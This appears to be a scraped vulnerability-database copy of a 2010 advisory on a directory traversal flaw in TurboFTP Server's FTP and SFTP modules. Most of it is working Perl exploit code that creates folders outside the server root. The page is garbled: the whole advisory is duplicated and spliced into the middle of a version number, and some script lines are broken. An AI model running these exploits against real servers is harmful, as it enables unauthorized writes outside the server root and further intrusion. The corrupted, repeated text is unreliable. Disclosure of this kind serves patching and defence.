Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24097
HistoryJun 20, 2010 - 12:00 a.m.

TurboFTP Server Directory Traversal Vulnerability

2010-06-2000:00:00
vulners.com
31

Date of Discovery:
17-Jun-2010

Credits:
leinakesi[at]gmail.com

Vendor:
Turbo FTP Server

Affected:
Turbo FTP Server 1.20Date of Discovery:
17-Jun-2010

Credits:
leinakesi[at]gmail.com

Vendor:
Turbo FTP Server

Affected:
Turbo FTP Server 1.20.745.
Earlier versions may also be affected.

Overview:
1.vendor description of software

TurboFTP Server is a high performance, secure, scalable and management friendly file transfer server
running on Windows platforms. With it you can easily set up a secure file transfer server that delivers
regular FTP, FTP over SSL/TLS, and "SFTP over SSH" services with virtual domains, advanced directory access
control, virtual folders, IP access control, flexible authentication options and many other features.
2.vulnerability details:

Directory Traversal Vulnerability exists in "FTP" and "SFTP" module of Turbo FTP Server that allows an
authenticated user to create directories outside the root directory, which may lead to other attacks.

If you could log on the server successfully,
take the following steps to create folders outside the sftp root directory:

  1.  $ssh2 = Net::SSH2->new();
    
  2.  $ssh2->connect($server, $port);
    
  3.  $ssh2->auth_password($user, $pass);
    
  4.  $sftp = $ssh2->sftp();
    
  5.  $m = $sftp->mkdir("..\\A\\");
    
  6.  $ssh2->disconnect();
    

take the following steps to create folders outside the ftp root directory:

  1.  $ftp = Net::FTP->new($server, Debug => 0);      
    
  2.  $ftp->login($user, $pass);
    
  3.  $ftp->mkdir("..\\AA");
    
  4.  $ftp->quit;
    

Severity:
Medium

Exploit example_1=======>sftp module:

#!/usr/bin/perl
#leinakesi[at]gmail.com
#turboFTP Server(sftp module) directory traversal vulnerability

use Net::SSH2;
use Getopt::Std;

@FUZZ = ("…\\A\\", "…\\AA");
getopts('S:P:u:p:', \%opts);
$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass = $opts{'p'};

if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) )
{
print "usage:\n\tperl test.pl -S [IP] -P [port] -u [user] -p [password]\nexample:\n";
print "\tperl test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";
exit(0);
}

$ssh2 = Net::SSH2->new();
$ssh2->connect($server, $port) || die "can not connect the server, please check.\n";
$ssh2->auth_password($user, $pass) || die "you sure user name and password are correct?\n";
$sftp = $ssh2->sftp();

foreach(@FUZZ)
{
if($m = $sftp->mkdir($))
{
print "mkdir success, $
\n";
}
}

$ssh2->disconnect();
exit(0);


Exploit example_2=======>ftp module:

#!/usr/bin/perl
#leinakesi[at]gmail.com
#turboFTP Server(ftp module) directory traversal vulnerability

use Net::FTP;
use Getopt::Std;

getopts('S:P:u:p:', \%opts);
$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass = $opts{'p'};

if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) )
{
print "usage:\n\tperl test.pl -S [IP] -P [port] -u [user] -p [password]\nexample:\n";
print "\tperl test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";
exit(0);
}

$ftp = Net::FTP->new($server, Debug => 0) or die "Cannot connect to some.host.name: $@";
$ftp->login($user, $pass) or die "Cannot login ", $ftp->message;
$ftp->mkdir("…\\AA") or die "Cannot change working directory ", $ftp->message;
$ftp->quit;
exit(0);.745.
Earlier versions may also be affected.

Overview:
1.vendor description of software

TurboFTP Server is a high performance, secure, scalable and management friendly file transfer server
running on Windows platforms. With it you can easily set up a secure file transfer server that delivers
regular FTP, FTP over SSL/TLS, and "SFTP over SSH" services with virtual domains, advanced directory access
control, virtual folders, IP access control, flexible authentication options and many other features.
2.vulnerability details:

Directory Traversal Vulnerability exists in "FTP" and "SFTP" module of Turbo FTP Server that allows an
authenticated user to create directories outside the root directory, which may lead to other attacks.

If you could log on the server successfully,
take the following steps to create folders outside the sftp root directory:

  1.  $ssh2 = Net::SSH2->new();
    
  2.  $ssh2->connect($server, $port);
    
  3.  $ssh2->auth_password($user, $pass);
    
  4.  $sftp = $ssh2->sftp();
    
  5.  $m = $sftp->mkdir("..\\A\\");
    
  6.  $ssh2->disconnect();
    

take the following steps to create folders outside the ftp root directory:

  1.  $ftp = Net::FTP->new($server, Debug => 0);      
    
  2.  $ftp->login($user, $pass);
    
  3.  $ftp->mkdir("..\\AA");
    
  4.  $ftp->quit;
    

Severity:
Medium

Exploit example_1=======>sftp module:

#!/usr/bin/perl
#leinakesi[at]gmail.com
#turboFTP Server(sftp module) directory traversal vulnerability

use Net::SSH2;
use Getopt::Std;

@FUZZ = ("…\\A\\", "…\\AA");
getopts('S:P:u:p:', \%opts);
$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass = $opts{'p'};

if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) )
{
print "usage:\n\tperl test.pl -S [IP] -P [port] -u [user] -p [password]\nexample:\n";
print "\tperl test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";
exit(0);
}

$ssh2 = Net::SSH2->new();
$ssh2->connect($server, $port) || die "can not connect the server, please check.\n";
$ssh2->auth_password($user, $pass) || die "you sure user name and password are correct?\n";
$sftp = $ssh2->sftp();

foreach(@FUZZ)
{
if($m = $sftp->mkdir($))
{
print "mkdir success, $
\n";
}
}

$ssh2->disconnect();
exit(0);


Exploit example_2=======>ftp module:

#!/usr/bin/perl
#leinakesi[at]gmail.com
#turboFTP Server(ftp module) directory traversal vulnerability

use Net::FTP;
use Getopt::Std;

getopts('S:P:u:p:', \%opts);
$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass = $opts{'p'};

if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) )
{
print "usage:\n\tperl test.pl -S [IP] -P [port] -u [user] -p [password]\nexample:\n";
print "\tperl test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";
exit(0);
}

$ftp = Net::FTP->new($server, Debug => 0) or die "Cannot connect to some.host.name: $@";
$ftp->login($user, $pass) or die "Cannot login ", $ftp->message;
$ftp->mkdir("…\\AA") or die "Cannot change working directory ", $ftp->message;
$ftp->quit;
exit(0);